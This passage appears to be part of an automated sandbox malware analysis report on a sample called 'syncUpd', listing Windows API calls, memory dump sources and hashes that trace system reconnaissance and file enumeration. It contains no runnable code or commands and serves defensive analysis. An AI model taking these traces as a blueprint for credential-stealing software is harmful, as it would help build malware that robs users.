                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CrackInternetlstrlenmalloc
                                                                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                                                                              • API String ID: 3848002758-4251816714
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00415B84
                                                                                                                                                                                                                                                              • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00415BA5
                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415BAF
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3183270410-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 4203777966-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1103761159-0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0094354E
                                                                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 0094356E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Offset: 00942000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_942000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction ID: a2f614f4c54c1cc04ac6633843edd01d15b106d88ef456d402721f2c9b5edc32
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BEF06D326007116BE7203AB9A88DF6A76ECAF99725F108528F64A910C0DB70EE458A61
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: InfoSystemwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2452939696-0
                                                                                                                                                                                                                                                              • Opcode ID: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                                              • Instruction ID: d87a4f6b3ea3f44bdf221dc5e2fa01f01132d118a4d77551e5f155a4815ada85
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae5762f0629c30c52eb39fe9d29b6f6254fbc8fd6ef0ba27fd947bac7523c98c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FAD012B580020C5BD720DBD0ED49AE9B77DBB44204F4049A5EE1492140EBB96AD58AA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000400,?,?,008F0223,?,?), ref: 008F0E19
                                                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,008F0223,?,?), ref: 008F0E1E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: ErrorMode
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                                                                                                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                              • Instruction ID: 871f1ad702813c1d58b0d788e193df3154170197c2f1ac7536c0ed9c79c35ec1
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83D0123154512CB7D7002A94DC09BDD7B1CDF05B62F008411FB0DD9081C770994046E5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2087232378-0
                                                                                                                                                                                                                                                              • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                              • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0095DA10,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1004333139-0
                                                                                                                                                                                                                                                              • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                              • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00943236
Memory Dump Source
• Source File: 0000000F.00000002.2758267027.0000000000942000.00000040.00000020.00020000.00000000.sdmp, Offset: 00942000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_942000_syncUpd.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: malloc
• String ID:
• API String ID: 2803490479-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• wsprintfA.USER32 ref: 00411669
• FindFirstFileA.KERNEL32(?,?), ref: 00411680
• lstrcat.KERNEL32(?,?), ref: 004116D2
• StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
• StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00411980
• FindClose.KERNEL32(000000FF), ref: 00411995
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextlstrcatwsprintf
• String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
• API String ID: 1125553467-2524465048
Uniqueness

Uniqueness Score: -1.00%

APIs
• wsprintfA.USER32 ref: 00412589
• FindFirstFileA.KERNEL32(?,?), ref: 004125A0
• StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
• StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
• FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
• FindClose.KERNEL32(000000FF), ref: 004127CE
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: Find$File$CloseFirstNextwsprintf
• String ID: %s\%s$%s\%s$%s\*
• API String ID: 180737720-445461498
Uniqueness

Uniqueness Score: -1.00%

APIs
• wsprintfA.USER32 ref: 009018D0
• FindFirstFileA.KERNEL32(?,?), ref: 009018E7
• lstrcat.KERNEL32(?,?), ref: 00901939
• StrCmpCA.SHLWAPI(?,0041D7F8), ref: 0090194B
• StrCmpCA.SHLWAPI(?,0041D7FC), ref: 00901961
• FindNextFileA.KERNEL32(000000FF,?), ref: 00901BE7
• FindClose.KERNEL32(000000FF), ref: 00901BFC
Memory Dump Source
• Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
Yara matches
Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1125553467-0
                                                                                                                                                                                                                                                              • Opcode ID: ad035d2452cfe8c571d31484953574fcc576d20caed83110d92fb8222da88d5d
                                                                                                                                                                                                                                                              • Instruction ID: b2da76e54139debb2110315e56be9ade241601a02067048fbf282dbacc0cb0a7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad035d2452cfe8c571d31484953574fcc576d20caed83110d92fb8222da88d5d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9D9143B29006189FDB24EBA4DC85FEE737DBF94700F044589F61A96180EB749B85CFA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00412314
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0095DCD0), ref: 00412339
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00964F28), ref: 0041234C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00412359
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0041236A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s$%s\*
                                                                                                                                                                                                                                                              • API String ID: 13328894-2848263008
                                                                                                                                                                                                                                                              • Opcode ID: 9981a7beed2cde5139ba051f86bf9b6729deee4ded77a24f3aafbd8258fa87e2
                                                                                                                                                                                                                                                              • Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9981a7beed2cde5139ba051f86bf9b6729deee4ded77a24f3aafbd8258fa87e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 009027F0
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00902807
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D864), ref: 00902835
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D868), ref: 0090284B
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00902A20
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00902A35
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 180737720-0
                                                                                                                                                                                                                                                              • Opcode ID: 26faf157f702507331b55cdccac807b87ca62a28b2772986770582c89584f0b0
                                                                                                                                                                                                                                                              • Instruction ID: 587c86b541892a3fbca34c8e9b89d5a124da974a5afdeca889d7bb93fb3fd3ff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26faf157f702507331b55cdccac807b87ca62a28b2772986770582c89584f0b0
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B86147B2900618ABDB24EBE4DD49EEA737DBF58700F044589F60A96080EF749B85CF91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                                              • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                                              • Opcode ID: 8b93bd78b39c71b977efe68c3536e7246d8c1b7eb887c6d70fda356c8a532265
